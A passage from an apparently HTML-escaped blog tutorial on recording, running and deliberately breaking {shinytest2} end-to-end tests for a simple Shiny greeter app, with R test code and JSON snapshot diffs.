&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This may lead {shinytest2} to install some additional packages (e.g.,
{shinyvalidate}, {globals}).&lt;/p&gt;
&lt;p&gt;Eventually the app will open, with the {shinytest2} recorder panel
alongside.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/graphics/shinytest2-recorder.png" alt="The test-recorder panel for shinytest2. On the left hand side is the Shiny app, consisting of an input box asking 'What is your name' and a button saying Greet. The right hand side contains the {shinytest2} panel, with options to select 'Expect Shiny values' and 'Expect screenshot', a box containing code from the test, and a save option with a warning message 'Can not save tests for a Shiny object. Please supply an application directory to record_test(app_dir =)'" /&gt;
&lt;p&gt;We note a few things: the test recorder warns that it “Can not save
tests for a shiny object”. This happened because we passed an App
object, rather than a directory, to &lt;code&gt;record_test()&lt;/code&gt;. It’s nothing to
worry about though, because any code generated by {shinytest2} can be
copied from the code panel into a test script.&lt;/p&gt;
&lt;p&gt;To test the app, we click on the “What is your name?” entry box, type
“Jumping Rivers”, and then click on the “Greet” button.&lt;/p&gt;
&lt;p&gt;We then click on the “Expect Shiny values” button in the test recorder
panel.&lt;/p&gt;
&lt;p&gt;A code snippet that looks like this is shown in the “code” panel.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_window_size&lt;/span&gt;(width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1619&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;970&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_values&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To turn that into a usable test, we create a test file in
&lt;code&gt;./tests/testthat/&lt;/code&gt; with a meaningful name. We’ll call it
&lt;code&gt;test-e2e-greeter_accepts_username.R&lt;/code&gt;. The “e2e” in the file name
indicates that this is an “end-to-end” test (it tests against the
running app), and so distinguishes it from your unit tests and
&lt;code&gt;testServer()&lt;/code&gt;-driven reactivity tests.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add the test script `./tests/testthat/test-e2e-greeter_accepts_username.R`&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_test&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;e2e-greeter_accepts_username&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We use the test skeleton described above:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./tests/testthat/test-e2e-greeter_accepts_username.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app updates user&amp;#39;s name on clicking the button&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: The app is open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; shiny_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinyGreeter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;AppDriver&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;new&lt;/span&gt;(shiny_app, name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_window_size&lt;/span&gt;(width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1619&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;970&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: a greeting is printed to the screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_values&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;(Note that the window-size command isn’t really part of the test, so we
separate that from the test actions).&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/graphics/shinytest2-recorder-with-greeting.png" alt="The test-recorder panel after the user inputs their name. As in previous image, but input box now contains the text 'Jumping Rivers' and beneath the Greet button are the words 'Hello Jumping Rivers!' The {shinytest2} panel code section now contains more lines of code about what occured in the test." /&gt;
&lt;h2 id="running-your-first-test"&gt;Running your first test&lt;/h2&gt;
&lt;p&gt;You’ve written a test. Now how do you run it?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Method 1:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# - Type this in the console to load the package and run the tests in your R session&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Method 2:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# - In RStudio, use the &amp;#34;Ctrl-Shift-T&amp;#34; shortcut to run the tests in a separate session&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Method 3:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# - Load the package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;load_all&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# - and then run the tests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;testthat&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_local&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Each of these approaches will load the current version of the package
and run any tests found within it.&lt;/p&gt;
&lt;p&gt;It’s important to know that when your tests run, the app and the tests
run in different R sessions from each other. &lt;code&gt;devtools::test()&lt;/code&gt; and
partners load the ‘under-development’ version of your package into the
session where the tests run. But, that isn’t where the app runs. For our
simple app, the code above is sufficient to ensure that the
‘under-development’ version of the app is used when the tests run
(&lt;code&gt;AppDriver$new(shinyGreeter::run())&lt;/code&gt; passes the correct version of the
app to the app-session). In more complicated situations, you may need to
install your package prior to running the {shinytest2}-based tests
(please see the
&lt;a href="https://rstudio.github.io/shinytest2/articles/use-package.html" rel="external"&gt;documentation&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;When the test initially runs, a couple of warnings will show up.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/graphics/shinytest2-initial-snapshot-warning.png" alt="Warnings are thrown when a snapshot test is first run. The console in which the tests have been run showing two warnings. 'the greeter app updates users name on clicking the button' and 'the greeter app updates users name on clicking the button, each followed by 'new file snapshot: tests/testthat/_snaps/greeter-001_.png' The final lines are 'Results, Duration: 2.3 s, [FAIL 0 | WARN 2 | SKIP 0 | PASS 1]'" /&gt;
&lt;p&gt;These indicate that some snapshot files have been saved within your
repository. The snapshots provide a ground truth against which
subsequent test runs are compared. For the test we’ve just written, the
snapshots are saved in the directory
&lt;code&gt;./tests/testthat/_snaps/e2e-greeter_accepts_username/&lt;/code&gt; as
&lt;code&gt;greeter-001_.png&lt;/code&gt; and &lt;code&gt;greeter-001.json&lt;/code&gt; and contain a picture of the
state of the app (in the &lt;code&gt;.png&lt;/code&gt;) and any input / output / export values
that are stored by shiny (in the &lt;code&gt;.json&lt;/code&gt;) at the point when
&lt;code&gt;app$expect_values()&lt;/code&gt; was called.&lt;/p&gt;
&lt;p&gt;Important: If you change the code for either your app, or your tests,
you may have to update these snapshot files.&lt;/p&gt;
&lt;h3 id="rerunning-your-first-test"&gt;Rerunning your first test&lt;/h3&gt;
&lt;p&gt;We have written our first test case, and by doing an initial run, we
have saved some snapshot files that contain our expectations for that
test case.&lt;/p&gt;
&lt;p&gt;If we now rerun the test using “Ctrl-Shift-T”, we see that the test
passes, and we no longer see the warnings that arise when initially
saving the snapshot files.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/graphics/shinytest2-first-passing-test.png" alt="The first successful snapshot test run. The console where the test was run, containing the text 'Loading shinyGreeter, Testing shinyGreeter, Loading required package: shiny, tick symbol | F W S OK | Context, tick symbol, | 1 | e2e-greeter_accepts_username [2.8s], Results, Duration: 2.8 s, [FAIL 0 | WARN 0 | SKIP 0 | PASS 1]'" /&gt;
&lt;h2 id="breaking-your-test-andor-your-app"&gt;Breaking your test and/or your app&lt;/h2&gt;
&lt;p&gt;We’ve got a passing test. Great!&lt;/p&gt;
&lt;p&gt;Now let’s break it!&lt;/p&gt;
&lt;p&gt;Sorry, what?&lt;/p&gt;
&lt;p&gt;One of the purposes of these tests is to highlight when / where you’ve
introduced some code that causes some important aspect of your app to
break. So if we don’t know that the tests will fail when they should in
an artificial setting, how can we expect them to fail when we need them
to?&lt;/p&gt;
&lt;p&gt;Let’s keep the snapshot files as they are and modify the test code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./tests/testthat/test-e2e-greeter_accepts_username.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app updates user&amp;#39;s name on clicking the button&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# ... snip ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Robots&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# ... snip ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With the test case modified, it now fails when the tests are ran -
printing the following message:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Failure &lt;/span&gt;(test&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;e2e&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;greeter_accepts_username.R&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;13&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; the greeter app updates user&lt;span style="color:#a5d6ff"&gt;&amp;#39;s name on clicking
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;the button
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;Snapshot of `file` to &amp;#39;&lt;/span&gt;e2e&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;greeter_accepts_username&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;greeter&lt;span style="color:#a5d6ff"&gt;-001&lt;/span&gt;.json&lt;span style="color:#a5d6ff"&gt;&amp;#39; has changed
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;Run `testthat::snapshot_review(&amp;#39;&lt;/span&gt;e2e&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;greeter_accepts_username&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;)` to review changes
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;# ... snip ...
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;Warning (test-e2e-greeter_accepts_username.R:13:3): the greeter app updates user&amp;#39;&lt;/span&gt;s name on clicking
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;the button
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Diff &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; snapshot file `e2e-greeter_accepts_usernamegreeter-001.json`
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; before
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; after
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;@@&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;@@&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;input&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Robots&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;output&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Jumping Rivers!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Jumping Robots!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;export&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We would have got the same test-failure, error and a similar warning if
we had left the test-case unmodified and broken the app, by hard-coding
the app to bind “Hello Jumping Robots!” to &lt;code&gt;output$greeting&lt;/code&gt;. You can
prove that for yourself, though.&lt;/p&gt;
&lt;p&gt;If we look in the &lt;code&gt;tests/testthat/_snaps&lt;/code&gt; directory, that test-failure
has led to two new files being added. We have &lt;code&gt;greeter-001_.new.png&lt;/code&gt; and
&lt;code&gt;greeter-001.new.json&lt;/code&gt; in addition to the snapshot files that were added
when the (correct) test-case was initially ran. The new files are the
output from the app for the broken version of our test.&lt;/p&gt;
&lt;p&gt;We can compare what the app images look like after the two versions of
the test using&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;testthat&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;snapshot_review&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;e2e-greeter_accepts_username/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;That opens a shiny app that allows us to update the snapshot files,
should we wish to.&lt;/p&gt;
&lt;p&gt;But the .json is a bit more interesting. This is the content for the
original test-case:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-json" data-lang="json"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;input&amp;#34;&lt;/span&gt;: {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;output&amp;#34;&lt;/span&gt;: {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Jumping Rivers!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;export&amp;#34;&lt;/span&gt;: {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For the modified test-case, the &lt;code&gt;input$name&lt;/code&gt; and &lt;code&gt;output$greeting&lt;/code&gt;
values are modified.&lt;/p&gt;
&lt;p&gt;As stated above, every &lt;code&gt;input&lt;/code&gt;, &lt;code&gt;output&lt;/code&gt; and &lt;code&gt;export&lt;/code&gt; value that is
stored by shiny at the point when the snapshot was taken is present in
this .json file. For a large app, this will include many many things
that are irrelevant to the behaviour that a given test-case is
attempting to check.&lt;/p&gt;
&lt;p&gt;Again, one of the purposes of your tests is to help identify when some
new code breaks existing functionality. What you don’t want is for a
given test to fail when the behaviour it is assessing works fine, but
some disconnected part of the app has changed.&lt;/p&gt;
&lt;p&gt;With {shinytest2}, you can ensure that you only look at the value for
specific variables when making snapshot files. This can help make your
tests more focussed and prevent spurious failures.&lt;/p&gt;
&lt;p&gt;Here, we might rewrite the test to just check the value stored in
&lt;code&gt;output$greeting&lt;/code&gt;:&lt;/p&gt;
